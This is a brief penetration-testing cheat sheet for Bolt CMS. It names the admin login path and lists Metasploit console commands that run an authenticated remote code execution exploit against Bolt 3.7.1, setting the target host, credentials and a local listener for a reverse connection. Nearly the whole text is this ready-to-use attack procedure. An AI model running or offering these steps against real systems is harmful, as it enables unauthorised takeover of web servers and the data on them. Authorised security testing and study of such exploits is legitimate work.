Bolt CMS Pentesting

Bolt is an open-source content managemtn system based on PHP.

Login Page

/bolt


Remote Code Execution (v3.7.1)

msfconsole
msf> use exploit/unix/webapp/bolt_authenticated_rce
msf> set lhost <local-ip>
msf> set rhosts <target-ip>
msf> set username <username>
msf> set password <password>
msf> run